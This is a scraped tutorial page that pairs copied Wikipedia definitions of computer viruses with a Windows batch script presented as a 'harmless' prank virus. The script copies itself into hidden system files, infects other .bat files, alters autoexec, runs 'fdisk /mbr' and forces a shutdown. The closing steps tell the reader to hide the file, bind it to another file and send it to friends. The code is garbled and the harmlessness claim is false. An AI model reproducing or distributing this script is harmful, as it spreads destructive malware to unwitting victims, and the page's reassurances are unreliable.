Вы находитесь на странице: 1из 2

A computer virus is a computer program that can copy itself and infect a compute r.

The term virus is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability . A true virus can only spread from one computer to another (in some form of exe cutable code) when its host is taken to the target computer; for instance becaus e a user sent it over a network or the Internet, or carried it on a removable me dium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their ch ances of spreading to other computers by infecting files on a network file syste m or a file system that is accessed by another computer.(Source Wikipedia) As stated above, the term computer virus is sometimes used as a catch-all phrase t o include all types of malware, adware, and spyware programs that do not have th e reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can exploit sec urity vulnerabilities to spread itself automatically to other computers through networks, while a Trojan is a program that appears harmless but hides malicious functions. Worms and Trojans, like viruses, may harm a computer system s data or p erformance. Some viruses and other malware have symptoms noticeable to the compu ter user, but many are surreptitious and go unnoticed.(Source Wikipedia) Understand the following: It s just a harmless virus . It only prints some scary mess ages and finally shuts down the computer. As you start it again, your computer w ill work as it did before! Read the virus: Below you see the Computer-Code that is executed as you start th e virus. The lines that start with REM are comments that the computer ignores. T he explain you what the above line does. @echo off title %0 rem conditional check. echo welcome to this wonderful program! please wait while I delete all your file s! rem infection of the user copy %0 c:tmp.bat >null attrib +r +s +h c:tmp.bat echo for %%i in (*.bat) do cop y c:tmp.bat+%%i %%i >>c:windowssystem32autoexec.NT echo echo virus detected! >>c:windowssystem32autoexec.NT echo pause >>c:windowssystem32autoexec.NT echo NT core:infected! echo echo shame on you! >>c:autoexec.bat echo echo system hault-virus identified! >>c:autoexec.bat echo chkdsk >>c:autoexec.bat echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l fdisk /mbr shutdown -s -t 03 -c windows has shut down because the lsass service has incounte red a write fault at 000000000000000000000000000000000000? Code Details @echo off color 1a (Changes the colour) echo (Displays a text) echo: (leaves a line) ping -n 2 127.0.0.1>nul (pings your localhost nothing much) shutdown.exe (shutdown) Read and understand the warnings! Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.

Copy and Paste the Code of the virus into Notepad Click File -> Save as Decide for a location to save the fake-virus. You should chose a location where the user won t find the file, so saving it on the desktop would be a bad idea! Change .txt to All files in the file type drop-down menu Chose a harmless filename. Replace the .txt at the with .bat Click on save and close Notepad. Now We Have Completed Making The Virus And Now We Must Bind The Virus With Any O ther File Read-How To Bind Two Files Together?[TUT] And After Binding The File Then Just Sent This File To Your Friends Then You can Just sit back and enjoy the show!

Вам также может понравиться